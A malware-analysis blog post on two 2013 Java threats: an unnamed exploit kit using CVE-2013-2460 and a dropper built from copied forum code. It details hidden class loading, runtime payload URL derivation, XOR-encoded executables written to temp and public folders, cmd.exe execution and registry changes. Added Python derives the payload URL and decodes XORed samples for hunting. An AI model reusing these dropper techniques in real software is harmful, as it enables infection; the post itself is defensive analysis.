<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhu3VbppBF6CxJKa2ZnI8He6ufFFowhYxpwf82BTN6LfHbVk0IjS0U4f-TmOKL_fF65TSePxVJF5T56BPz2ZRVNCUiSAnFvsiuYwloJ5sZXNGGbN96XtY7eBcWYo2vuwawnzkVgW91CFvt5/s1600/Unkown_2013-11-22_CVE-2013-2460.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhu3VbppBF6CxJKa2ZnI8He6ufFFowhYxpwf82BTN6LfHbVk0IjS0U4f-TmOKL_fF65TSePxVJF5T56BPz2ZRVNCUiSAnFvsiuYwloJ5sZXNGGbN96XtY7eBcWYo2vuwawnzkVgW91CFvt5/s1600/Unkown_2013-11-22_CVE-2013-2460.png" height="55" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">part of exploit code for '<span style="color: #3d85c6;">CVE-2013-2460</span>'(after deobfuscation)</span></i></div>
<br />
Once execution privileges are elevated (the exploit disables the sandbox), a hidden class is decoded and loaded. The class file is stored inside the JAR encoded with '<span style="color: #3d85c6;">base64</span>'; during this process it is written to the Java temp folder under the file name '<span style="color: #3d85c6;">NewClass.class</span>'. This class handles the Initial Payload download and execution.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgaDLXz7Bkb98A0N5A5HxZhSzYBr7MeHyMC3UDyf9ChhUg_Id59ivwnTyC3MgrvsVN33BWA95lZe3qpqwpJgGyVnUUcn6b1pMGXcIjEBeJqI0-GsKNnpM8_SJqVSRwlJ0j0YO_v5cfhwu4v/s1600/Unkown_2013-11-22_hidden_class.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgaDLXz7Bkb98A0N5A5HxZhSzYBr7MeHyMC3UDyf9ChhUg_Id59ivwnTyC3MgrvsVN33BWA95lZe3qpqwpJgGyVnUUcn6b1pMGXcIjEBeJqI0-GsKNnpM8_SJqVSRwlJ0j0YO_v5cfhwu4v/s1600/Unkown_2013-11-22_hidden_class.png" height="47" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">part of '<span style="color: #3d85c6;">base64</span>' encoded hidden .class file</span></i></div>
<br />
The Initial Payload URL is not stored in any of the parameters passed to the JVM or in any variable within the code. Instead, it is generated at run time using some tricks JavaFX has to offer.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgOXZPUPBTRuJSn9fE9T23Gas0MvjHEZM34CzJLIQPKKs7PiqJBmPYBdFyLFod3su2iUHxGIpvpDCf_luFaaKg9aY5x7YP1nIhyxEYoxGj8JSHZbBei5UrjbOs_mVJ0BUU51MRKuOz1JBqI/s1600/Unkown_2013-11-22_payload_path_partial.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgOXZPUPBTRuJSn9fE9T23Gas0MvjHEZM34CzJLIQPKKs7PiqJBmPYBdFyLFod3su2iUHxGIpvpDCf_luFaaKg9aY5x7YP1nIhyxEYoxGj8JSHZbBei5UrjbOs_mVJ0BUU51MRKuOz1JBqI/s1600/Unkown_2013-11-22_payload_path_partial.png" height="35" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">JavaFX trick to get part of JNLP URI</span></i> </div>
<br />
The code above returns the parent folder URI of the JNLP file - in this case '<span style="color: #3d85c6;">hxxp://vinnypedulla.com/5/201311/</span>'. The second part of the path is generated dynamically from the current time stamp following the pattern '<span style="color: #3d85c6;">HHmmss</span>' - for example, '<span style="color: #3d85c6;">113458.mp3</span>'. The routine in the screenshot below combines both parts and requests the Initial Payload.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUsSZiiBdVnfhzIWRHNzZEh6yog-URzAhnEsKtKAxMtYRpEG-JTdpQobplTdZrxrCGqGdEN2wZwm28K4Ibmohpeq_b-xs8B1_lDt-rRAumA7n4AUmZZjHPXl5-FhsJPnT6B5Afy0sELwHm/s1600/Unkown_2013-11-22_payload_path_partial2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUsSZiiBdVnfhzIWRHNzZEh6yog-URzAhnEsKtKAxMtYRpEG-JTdpQobplTdZrxrCGqGdEN2wZwm28K4Ibmohpeq_b-xs8B1_lDt-rRAumA7n4AUmZZjHPXl5-FhsJPnT6B5Afy0sELwHm/s1600/Unkown_2013-11-22_payload_path_partial2.png" height="91" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">part of the Initial Payload fetcher code</span></i></div>
<br />
The Initial Payload file name is created by joining the same six digits (the time stamp) with the '<span style="color: #3d85c6;">.exe</span>' string. The file is stored in the Java temp folder. Before it is stored and executed, it is decoded using XOR with the predefined key '<span style="color: #3d85c6;">binkey</span>'.<br />
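<div>
An added example, not code from the Infinity EK sample: the Python below reproduces the Initial Payload URL derivation described above, names the dropped file the way the kit does, and decodes a payload XORed with '<span style="color: #3d85c6;">binkey</span>', checking for a PE header afterwards. Two assumptions the post does not spell out: the six-byte key is applied cyclically, and the JavaFX trick returns the parent folder of the JNLP URL. The JNLP file name '<span style="color: #3d85c6;">app.jnlp</span>' is hypothetical, the capture time is chosen to match the '<span style="color: #3d85c6;">113458</span>' example above, and the payload bytes are constructed.</div>

```python
"""
Added example, not code from the Infinity EK sample.  Assumptions: the key
'binkey' is applied cyclically, and the JNLP URL's parent folder is what the
JavaFX trick returns.  'app.jnlp' is hypothetical; FAKE_PE is constructed.
"""
import re
from datetime import datetime

KEY = b"binkey"
PAYLOAD_RE = re.compile(r"/(\d{6})\.mp3$")

# Constructed: a request time matching the post's '113458.mp3' example.
CAPTURE_TIME = datetime(2013, 11, 22, 11, 34, 58)


def jnlp_parent(jnlp_url):
    """Parent folder of the JNLP file, e.g. hxxp://host/5/201311/."""
    return jnlp_url.rsplit("/", 1)[0] + "/"


def payload_url(jnlp_url, when):
    """Parent folder + HHmmss + '.mp3': the URL differs on every visit."""
    return jnlp_parent(jnlp_url) + when.strftime("%H%M%S") + ".mp3"


def dropped_name(when):
    """Same six digits with '.exe', as written to the Java temp folder."""
    return when.strftime("%H%M%S") + ".exe"


def xor_with_key(data, key=KEY):
    """Repeating-key XOR; symmetric, so it both encodes and decodes."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def decode_payload(blob, key=KEY):
    """Decode and insist on a PE 'MZ' header, so a wrong key or a truncated
    download fails here instead of at execution time."""
    out = xor_with_key(blob, key)
    if out[:2] != b"MZ":
        raise ValueError("decoded data has no MZ header: wrong key or not a PE")
    return out


def payload_timestamp(url):
    """HHmmss part of a candidate payload URL, or None when the URL does not
    fit the pattern or the digits are not a valid time.  Useful when hunting
    firewall or flow logs for the fetch that the browser proxy never saw."""
    m = PAYLOAD_RE.search(url)
    if not m:
        return None
    try:
        datetime.strptime(m.group(1), "%H%M%S")
    except ValueError:
        return None
    return m.group(1)


# Constructed stand-in for the PE payload as the kit would serve it.
FAKE_PE = b"MZ\x90\x00" + b"\x00" * 60 + b"This program cannot be run in DOS mode."
ENCODED = xor_with_key(FAKE_PE)

if __name__ == "__main__":
    print(payload_url("hxxp://vinnypedulla.com/5/201311/app.jnlp", CAPTURE_TIME))
    print(dropped_name(CAPTURE_TIME), decode_payload(ENCODED)[:2])
```

<div>
Because both the URL and the dropped file name come from the victim's clock at request time, the server has to accept any six-digit name, and a captured URL replayed later says nothing about whether the kit is still live; conversely, the '<span style="color: #3d85c6;">HHmmss.mp3</span>' shape under the JNLP codebase is a usable hunting pattern, but in firewall or flow logs rather than proxy logs, since the JVM fetches it directly.</div>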
<br />
<b><span style="color: #3d85c6;">"Summary"</span></b><br />
<br />
This exploit kit sample is implemented as a JavaFX application. Some variable names suggest the creator is a Turkish speaker, for example '<span style="color: #3d85c6;">fia</span>', '<span style="color: #3d85c6;">analiz</span>', '<span style="color: #3d85c6;">fout</span>' and '<span style="color: #3d85c6;">bais</span>' (note that '<span style="color: #3d85c6;">fout</span>' and '<span style="color: #3d85c6;">bais</span>' are also conventional Java abbreviations for FileOutputStream and ByteArrayInputStream, so '<span style="color: #3d85c6;">analiz</span>' carries most of the weight here). Light complexity. Will fail if the targeted machine is behind a web proxy and has no direct access to the Internet.<br />
<br />
<div class="CSSTableGenerator">
<table>
<tbody>
<tr>
<td style="background-color: #f79646; color: white;"><b>Summary Information</b></td>
<td style="background-color: #f79646; color: white;"><br /></td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Name:</td>
<td style="background-color: #b8cce4; color: black;">Unknown</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Date captured:</td>
<td style="background-color: #b8cce4; color: black;">2013-11-22</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Date analysed:</td>
<td style="background-color: #b8cce4; color: black;">2013-11-23</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Source/Credits:</td>
<td style="background-color: #b8cce4; color: black;">Intel source - <a href="https://twitter.com/Set_Abominae" rel="nofollow" target="_blank">@Set_Abominae</a>.<br />
Data source - live traffic capture with Fiddler.</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Infection vectors detected:</td>
<td style="background-color: #b8cce4; color: black;">Java/JavaFX</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Vulnerabilities targeted:</td>
<td style="background-color: #b8cce4; color: black;">CVE-2013-2460</td>
</tr>
<tr>
<td style="background-color: #f79646; color: white;"><b>Landing page</b></td>
<td style="background-color: #f79646; color: white;"><br /></td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Transfer mode:</td>
<td style="background-color: #b8cce4; color: black;">plain text</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Obfuscation:</td>
<td style="background-color: #b8cce4; color: black;">No</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">TDS:</td>
<td style="background-color: #b8cce4; color: black;">No</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">JNLP:</td>
<td style="background-color: #b8cce4; color: black;">Yes</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">JVM parameters:</td>
<td style="background-color: #b8cce4; color: black;">None</td>
</tr>
<tr>
<td style="background-color: #f79646; color: white;"><b>Java infection vector</b></td>
<td style="background-color: #f79646; color: white;"><br /></td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Analysed with:</td>
<td style="background-color: #b8cce4; color: black;">Java 1.7.17</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Obfuscation:</td>
<td style="background-color: #b8cce4; color: black;">Simple string values obfuscation</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">JAR hidden content:</td>
<td style="background-color: #b8cce4; color: black;">Hidden .class file - 'NewClass.class'</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Initial Payload delivery method:</td>
<td style="background-color: #b8cce4; color: black;">URL</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Initial Payload encryption/encoding:</td>
<td style="background-color: #b8cce4; color: black;">XOR, key 'binkey'</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Initial Payload store location:</td>
<td style="background-color: #b8cce4; color: black;">Java Temp folder</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Initial Payload filename:</td>
<td style="background-color: #b8cce4; color: black;">Generated from the current time (HHmmss) plus '.exe'</td>
</tr>
<tr>
<td style="background-color: #f79646; color: white;"><b>Adobe infection vector</b></td>
<td style="background-color: #f79646; color: white;"><br /></td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Analysed with:</td>
<td style="background-color: #b8cce4; color: black;">NA</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Initial Payload delivery method:</td>
<td style="background-color: #b8cce4; color: black;">NA</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Initial Payload store location:</td>
<td style="background-color: #b8cce4; color: black;">NA</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Initial Payload filename:</td>
<td style="background-color: #b8cce4; color: black;">NA</td>
</tr>
<tr>
<td style="background-color: #f79646; color: white;"><b>Automated analysis</b></td>
<td style="background-color: #f79646; color: white;"><br /></td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Exploit components:</td>
<td style="background-color: #b8cce4; color: black;"><pre>JAR - <a href="https://www.virustotal.com/en/file/7f8cbf0a861b8fb216b4b254366bce58e37c0f615ed484a12f79dff4b0ce5dfe/analysis/" rel="nofollow" target="_blank">https://www.virustotal.com</a></pre>
</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Delivered malware:</td>
<td style="background-color: #b8cce4; color: black;"><pre>EXE(MD5 b7b352ecb0ea8fc52c5a6a515b85c7e0)
<a href="https://malwr.com/analysis/YjQxZmM5YTJjMjkzNDdiY2JkMzQ4OTc3YmI2YmM4NjA/" rel="nofollow" target="_blank">https://malwr.com/</a>
<a href="https://www.virustotal.com/en/file/294eb42af69ea2e0353566fd18fa4f37b8ba3bfe97716513a21a8717d5e28ef9/analysis/" rel="nofollow" target="_blank">https://www.virustotal.com</a></pre>
</td>
</tr>
<tr>
<td style="background-color: #f79646; color: white;"><b>Additional Information</b></td>
<td style="background-color: #f79646; color: white;"><br /></td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;"><br /></td>
<td style="background-color: #b8cce4; color: black;">EK creator is possibly a Turkish-speaker.</td>
</tr>
</tbody></table>
</div>
<br />Unknown Java Malware: "Forget it, Jake. It’s Chinatown." (published 2013-10-08, updated 2013-10-08)<br />
NOTE: The information is based on a sample captured on 2013-10-03<br />
<br />
Another '<span style="color: #3d85c6;">piece of art</span>' by some actor learning how to '<span style="color: #3d85c6;">copy/paste</span>' code. There is nothing wrong with copy/paste as long as you understand what the code does. Judging by the amount of unused code, which even includes '<span style="color: #3d85c6;">System.out.println</span>' statements, it seems the author was afraid to change anything and accidentally break it. This in turn helped to narrow down the region the Java code probably comes from. This is also another example of Java malware that uses no exploit code at all, but instead targets users who run with administrator privileges on their machines. I'll tag it '<span style="color: #3d85c6;">Java Malware</span>' as it doesn't fit the definition of an exploit kit. The real danger of this type of malware is stealthiness: it stays under the radar as long as the payload it delivers is not detected by AV (and that is quite easily achievable).<br />
<br />
<b><span style="color: #3d85c6;">"Toto, I've a feeling we're not in Kansas anymore."</span></b><br />
<br />
The URL pattern for this sample is short and simple.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRtvxQ5kSbAQw4u3R5Wp6x6vHdtTNQM0BytGectnSQK5o4y6wWmTzUowtS45-2xfDIVEf6L18xHxHyNlkiRQkbQCscNynfks-cglyHraqm3vmdFOW7IYWTfX8Byrax0cVy5xi1LeXWA6Re/s1600/Unknown_2013-10-03_URL_pattern.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRtvxQ5kSbAQw4u3R5Wp6x6vHdtTNQM0BytGectnSQK5o4y6wWmTzUowtS45-2xfDIVEf6L18xHxHyNlkiRQkbQCscNynfks-cglyHraqm3vmdFOW7IYWTfX8Byrax0cVy5xi1LeXWA6Re/s1600/Unknown_2013-10-03_URL_pattern.png" height="36" width="320" /></a></div>
<br />
The landing page doesn't have any sophisticated parts either, but at least simple checks for Java presence and OS type are performed before the Java JAR file is pulled down.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9ohMMeejnhZqbJVQxCr8eoIPaQIwGgD81tPofPZe8GkdR8YwgeUUjp66AT7b2LqEtkWybgMuOBpOplh31rnE8wX8PiES_tpdQXzvdC7W-1Pok8EWiI3k4o1FjXRutyQi4LtcSUQN-pERc/s1600/Unknown_2013-10-03_Java_check.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9ohMMeejnhZqbJVQxCr8eoIPaQIwGgD81tPofPZe8GkdR8YwgeUUjp66AT7b2LqEtkWybgMuOBpOplh31rnE8wX8PiES_tpdQXzvdC7W-1Pok8EWiI3k4o1FjXRutyQi4LtcSUQN-pERc/s1600/Unknown_2013-10-03_Java_check.png" height="177" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">checking for Java Web Start or JNLP support in the browser </span></i></div>
<br />
Even though the checks above are performed, JNLP is not used to deliver the JAR file; these checks simply establish whether a Java RE is present. The returned '<span style="color: #3d85c6;">boolean</span>' value steers execution: if it is '<span style="color: #3d85c6;">false</span>' the script stops and exits, and if Java is found the following condition is checked next.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg81tKFoLepG4tem0AHZ6BiGV1emTDYtRpUPrCjCy-Yy_8idpDGfbRbxD01HfkdDnr-qnx2-Zm2E9Ds-uQSZ9Nj-lB7gObOFi6i83Ud3RnYYWp34F-C5gvreE62uJ_jB0m27CQl6oPOWefp/s1600/Unknown_2013-10-03_OS_check_JAR_pull.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg81tKFoLepG4tem0AHZ6BiGV1emTDYtRpUPrCjCy-Yy_8idpDGfbRbxD01HfkdDnr-qnx2-Zm2E9Ds-uQSZ9Nj-lB7gObOFi6i83Ud3RnYYWp34F-C5gvreE62uJ_jB0m27CQl6oPOWefp/s1600/Unknown_2013-10-03_OS_check_JAR_pull.png" height="24" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">OS type check and JAR request through '<span style="color: #3d85c6;">document.write</span>'</span></i></div>
<br />
This Java malware targets Windows machines only: even if Java is present, script execution stops if no Windows OS is detected. The detection is based on the browser's '<span style="color: #3d85c6;">User-Agent</span>' value, which the client controls, so an analyst replaying the landing page from another OS only needs to present a Windows User-Agent to receive the JAR.<br />
<br />
<b><span style="color: #3d85c6;">"This one time, at band camp..."</span></b><br />
<br />
As mentioned earlier, there is no exploit code in the JAR file. Execution starts by creating a simple folder structure on drive '<span style="color: #3d85c6;">C</span>'.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZgxJMuC4RasJi_pAg_rt2LMmzkr4iBH3VK5Dsj45zk0lqviaTkGo7JaDC_LFnKrcpEBqfB9niMfiCBXL7eAKIgfavhxIFG-j10ta9KyCDGibH46Iw8BBArex1RzHC3wDFBR1PPDrV8-5e/s1600/Unknown_2013-10-03_creating_folders.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZgxJMuC4RasJi_pAg_rt2LMmzkr4iBH3VK5Dsj45zk0lqviaTkGo7JaDC_LFnKrcpEBqfB9niMfiCBXL7eAKIgfavhxIFG-j10ta9KyCDGibH46Iw8BBArex1RzHC3wDFBR1PPDrV8-5e/s1600/Unknown_2013-10-03_creating_folders.png" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">call for '<span style="color: #3d85c6;">docmdsyn</span>' to create two folders</span></i></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBZjYZ1Bi-8nQ9eZ6hOPJ90ArvUOIflanP_UGerrXy-gXOr3tK7qPlUNysx8YjcWVr_4S0h3x1bh9ShxL6y-a1TWtcy3GSH9RbGIicGorsbXJp4D8MOaLLYf8OGpbgk6W9-YppFXUSFkU1/s1600/Unknown_2013-10-03_docmdsyn_function.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBZjYZ1Bi-8nQ9eZ6hOPJ90ArvUOIflanP_UGerrXy-gXOr3tK7qPlUNysx8YjcWVr_4S0h3x1bh9ShxL6y-a1TWtcy3GSH9RbGIicGorsbXJp4D8MOaLLYf8OGpbgk6W9-YppFXUSFkU1/s1600/Unknown_2013-10-03_docmdsyn_function.png" height="95" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">'<span style="color: #3d85c6;">docmdsyn</span>' function calls '<span style="color: #3d85c6;">cmd.exe</span>' to run the commands</span></i></div>
<br />
Regardless of the outcome of the two commands, execution continues with a request for the Initial Payload using a hardcoded URL and '<span style="color: #3d85c6;">borrowed</span>' Java code.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhc-Sv6LcnKFKzjlQ_dXuFOnIZAkj_7-z0LRZicP3jQp0oxxSIBj7oy6jH887S2ku7mZiIuVTuRvrNtwkiXiTWFG6lLycgU_Ey-67vdglKLBP2x6K72yL2q0VtS1GHs0XWGuFBX0J4EMDO1/s1600/Unknown_2013-10-03_payload_request.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhc-Sv6LcnKFKzjlQ_dXuFOnIZAkj_7-z0LRZicP3jQp0oxxSIBj7oy6jH887S2ku7mZiIuVTuRvrNtwkiXiTWFG6lLycgU_Ey-67vdglKLBP2x6K72yL2q0VtS1GHs0XWGuFBX0J4EMDO1/s1600/Unknown_2013-10-03_payload_request.png" height="62" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">hardcoded URL & '<span style="color: #3d85c6;">downloadFile</span>' function call</span></i></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3VUP7twwtBSbVFy4L2xHkfbdRVYhq9UuMiszUtacJZdZIfdFrdGacBdjwvN9PXC521bcaGxr_MqEmoUGj6R-g6ICsXRVle6f_-zyypqEq70S2CxBhkssjCcGAhptJY0uAzNdbY_-Myyz3/s1600/Unknown_2013-10-03_downloadFile_function.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3VUP7twwtBSbVFy4L2xHkfbdRVYhq9UuMiszUtacJZdZIfdFrdGacBdjwvN9PXC521bcaGxr_MqEmoUGj6R-g6ICsXRVle6f_-zyypqEq70S2CxBhkssjCcGAhptJY0uAzNdbY_-Myyz3/s1600/Unknown_2013-10-03_downloadFile_function.png" height="199" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">'<span style="color: #3d85c6;">downloadFile</span>' function</span></i></div>
<br />
Thinking that '<span style="color: #3d85c6;">this url is error</span>' sounds like rather strange English, I searched for the expression '<span style="color: #3d85c6;">System.out.println("this url is error");</span>' and noticed that most of the results point at Chinese websites. As far as I can tell with Google Translate, these are forums/boards used by Java developers to exchange knowledge and share code samples for different purposes. The samples there are an almost 100% match for the function in the screenshot above.<br />
<br />
The Initial Payload is XORed with a single-byte key - '<span style="color: #3d85c6;">0x12</span>'. The encoded payload is stored in '<span style="color: #3d85c6;">c:\users\public\svchost.cab</span>' (the '<span style="color: #3d85c6;">.cab</span>' extension is cosmetic, it is not a cabinet file) and passed to a function to decode it.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggOsNOErwGqUIxWLRQ1VRARxjAEqxDC1rRE2vT9Y93qhjQvx5wo9rVKKlWFM91to6nULMQ6Q344Gsg0DuZ5OGwlo8tTxao-ffx5u_NhiqLLuQJBAXnmRprVHwUyVBxG9hB_LdYkuU8bVkw/s1600/Unknown_2013-10-03_xorEn_function.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggOsNOErwGqUIxWLRQ1VRARxjAEqxDC1rRE2vT9Y93qhjQvx5wo9rVKKlWFM91to6nULMQ6Q344Gsg0DuZ5OGwlo8tTxao-ffx5u_NhiqLLuQJBAXnmRprVHwUyVBxG9hB_LdYkuU8bVkw/s1600/Unknown_2013-10-03_xorEn_function.png" height="155" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">part of '<span style="color: #3d85c6;">xorEn</span>' function code</span></i></div>
<br />
There is a lot of unused code, and the declaration of the '<span style="color: #3d85c6;">XOR_CONST</span>' variable is just a small example of it. Hoping to find something interesting, I did another search using just part of the declaration statement - '<span style="color: #3d85c6;">public static final byte XOR_CONST</span>'. Surprisingly, the results again pointed at the same Chinese websites, whose Java code samples match the code in the screenshot above quite closely, including the '<span style="color: #3d85c6;">xor</span>' key value. So, if not the author's location, at least some parts of the source code seem to be specific to one particular geographical region.<br />
<br />
Once the Initial Payload is decoded, it is stored in '<span style="color: #3d85c6;">c:\users\public\svchost.exe</span>' and executed using the same '<span style="color: #3d85c6;">docmdsyn</span>' function. That's not all, though. There is a small bonus in the form of some registry changes and a clean-up operation.<br />
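<br />
Added example (my own Python, not code from the analysed JAR): rather than trusting the '<span style="color: #3d85c6;">0x12</span>' read out of the decompiled source, recover the single-byte XOR key from the captured blob itself by brute-forcing all 256 keys and keeping the one that yields a valid PE header, then decode it. The blob below is a constructed stand-in for '<span style="color: #3d85c6;">svchost.cab</span>' (a minimal DOS/PE header XORed with 0x12); the function names are assumptions.<br />

```python
"""Recover a single-byte XOR key from an encoded PE payload and decode it.

Added example, not code from the analysed JAR. The sample XORs the downloaded
payload with 0x12, stores it as svchost.cab and decodes it to svchost.exe; the
blob below is a constructed stand-in for that .cab: a minimal DOS/PE header
padded with zeros, XORed with the same key. Function names are mine.
"""
import struct
from typing import Optional, Tuple

DOS_STUB_TEXT = b"This program cannot be run in DOS mode."


def xor_decode(data: bytes, key: int) -> bytes:
    """XOR every byte with the same single-byte key (the sample's 'xorEn' scheme)."""
    return bytes(b ^ key for b in data)


def looks_like_pe(data: bytes) -> bool:
    """True if data starts with 'MZ' and e_lfanew points at a 'PE\\0\\0' signature."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return 0x40 <= e_lfanew <= len(data) - 4 and data[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def recover_single_byte_key(blob: bytes) -> Optional[int]:
    """Try all 256 keys and return the one that yields a valid PE header.

    'MZ' alone is a weak check (the first byte of any blob fixes exactly one
    candidate key), so the PE signature at e_lfanew is required as well.
    Key 0 means the blob was not encoded at all.
    """
    candidates = [k for k in range(256) if looks_like_pe(xor_decode(blob, k))]
    return candidates[0] if len(candidates) == 1 else None


def decode_payload(blob: bytes) -> Tuple[int, bytes]:
    """Recover the key and return (key, decoded bytes); raise if no key fits."""
    key = recover_single_byte_key(blob)
    if key is None:
        raise ValueError("no single-byte XOR key yields a PE header")
    return key, xor_decode(blob, key)


def build_fake_pe(size: int = 0x100) -> bytes:
    """Constructed sample: DOS header, DOS stub text and a PE signature at 0x80."""
    hdr = bytearray(size)
    hdr[:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, 0x80)            # e_lfanew
    hdr[0x4E:0x4E + len(DOS_STUB_TEXT)] = DOS_STUB_TEXT
    hdr[0x80:0x84] = b"PE\0\0"
    return bytes(hdr)


SAMPLE_KEY = 0x12                                         # the key used by the analysed sample
ENCODED_SAMPLE = xor_decode(build_fake_pe(), SAMPLE_KEY)  # stand-in for svchost.cab

if __name__ == "__main__":
    key, plain = decode_payload(ENCODED_SAMPLE)
    print(f"key=0x{key:02x} header={plain[:2]!r} stub_present={DOS_STUB_TEXT in plain}")
```

For a real capture, read '<span style="color: #3d85c6;">svchost.cab</span>' into '<span style="color: #3d85c6;">blob</span>' and call '<span style="color: #3d85c6;">decode_payload</span>'; the same routine also tells you when a dropped file is not encoded at all (key 0) or uses something other than a single-byte XOR (no key fits).<br />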
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiV5Rj9rIzvh2srOyiERC0asiG5JSOmKdi3q5kIIQqcyrvJg9po9Ae8gacYtGIKg2OxlZ0FB5zPND4JCFrnkTRUa6WmuY0nL5lNHel4jHrTxQgVj7ZtPRTLe-VGp6hJ6l_2nqxG3ap8lzsl/s1600/Unknown_2013-10-03_bonus.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiV5Rj9rIzvh2srOyiERC0asiG5JSOmKdi3q5kIIQqcyrvJg9po9Ae8gacYtGIKg2OxlZ0FB5zPND4JCFrnkTRUa6WmuY0nL5lNHel4jHrTxQgVj7ZtPRTLe-VGp6hJ6l_2nqxG3ap8lzsl/s1600/Unknown_2013-10-03_bonus.png" height="22" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">Windows Terminal Services changes</span></i></div>
<br />
